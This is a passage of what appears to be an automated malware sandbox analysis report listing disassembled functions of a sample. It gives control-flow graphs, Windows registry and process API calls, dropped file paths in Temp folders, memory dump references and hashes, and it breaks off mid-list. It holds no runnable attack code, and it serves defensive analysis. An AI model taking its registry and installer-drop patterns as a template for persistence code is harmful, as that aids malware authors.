                                                                                                        control_flow_graph 656 4023e4-402415 call 402c41 * 2 call 402cd1 663 402ac5-402ad4 656->663 664 40241b-402425 656->664 665 402427-402434 call 402c41 lstrlenW 664->665 666 402438-40243b 664->666 665->666 669 40243d-40244e call 402c1f 666->669 670 40244f-402452 666->670 669->670 674 402463-402477 RegSetValueExW 670->674 675 402454-40245e call 403116 670->675 678 402479 674->678 679 40247c-40255d RegCloseKey 674->679 675->674 678->679 679->663
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
                                                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseValuelstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini
                                                                                                        • API String ID: 2655323295-804212927
                                                                                                        • Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                        • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                                        • Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                        • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                                                        Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 681 402d44-402d6d call 4060f1 683 402d72-402d74 681->683 684 402d76-402d7c 683->684 685 402dec-402df0 683->685 686 402d98-402dad RegEnumKeyW 684->686 687 402d7e-402d80 686->687 688 402daf-402dc1 RegCloseKey call 40665e 686->688 689 402dd0-402dde RegCloseKey 687->689 690 402d82-402d96 call 402d44 687->690 695 402de0-402de6 RegDeleteKeyW 688->695 696 402dc3-402dce 688->696 689->685 690->686 690->688 695->685 696->685
                                                                                                        APIs
                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$Enum
                                                                                                        • String ID:
                                                                                                        • API String ID: 464197530-0
                                                                                                        • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                        • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                        • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                        • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 782 4015c1-4015d5 call 402c41 call 405c04 787 401631-401634 782->787 788 4015d7-4015ea call 405b86 782->788 790 401663-402250 call 401423 787->790 791 401636-401655 call 401423 call 406284 SetCurrentDirectoryW 787->791 796 401604-401607 call 405838 788->796 797 4015ec-4015ef 788->797 803 402ac5-402ad4 790->803 804 40288b-402892 790->804 791->803 809 40165b-40165e 791->809 807 40160c-40160e 796->807 797->796 800 4015f1-4015f8 call 405855 797->800 800->796 815 4015fa-401602 call 4057bb 800->815 804->803 811 401610-401615 807->811 812 401627-40162f 807->812 809->803 813 401624 811->813 814 401617-401622 GetFileAttributesW 811->814 812->787 812->788 813->812 814->812 814->813 815->807
                                                                                                        APIs
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C12
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                          • Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,00000000,000000F0), ref: 0040164D
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\depersonaliseredes, xrefs: 00401640
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes
                                                                                                        • API String ID: 1892508949-2980550815
                                                                                                        • Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                        • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                                                        • Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                        • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                                                        Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
                                                                                                        • RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseQueryValue
                                                                                                        • String ID: : Completed
                                                                                                        • API String ID: 3356406503-2954849223
                                                                                                        • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                        • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                                        • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                        • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                                        Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                        Strings
                                                                                                        • Error launching installer, xrefs: 00405880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: Error launching installer
                                                                                                        • API String ID: 3712363035-66219284
                                                                                                        • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                        • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                        • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                        • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                        Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                        • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                        • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                        • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                        Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                        • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                                        • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                        • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                        Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                        • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                        • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                        • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                        Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                        • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                        • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                        • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                        Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                        • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                        • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                        • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                        Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                        • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                        • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                        • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                        Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
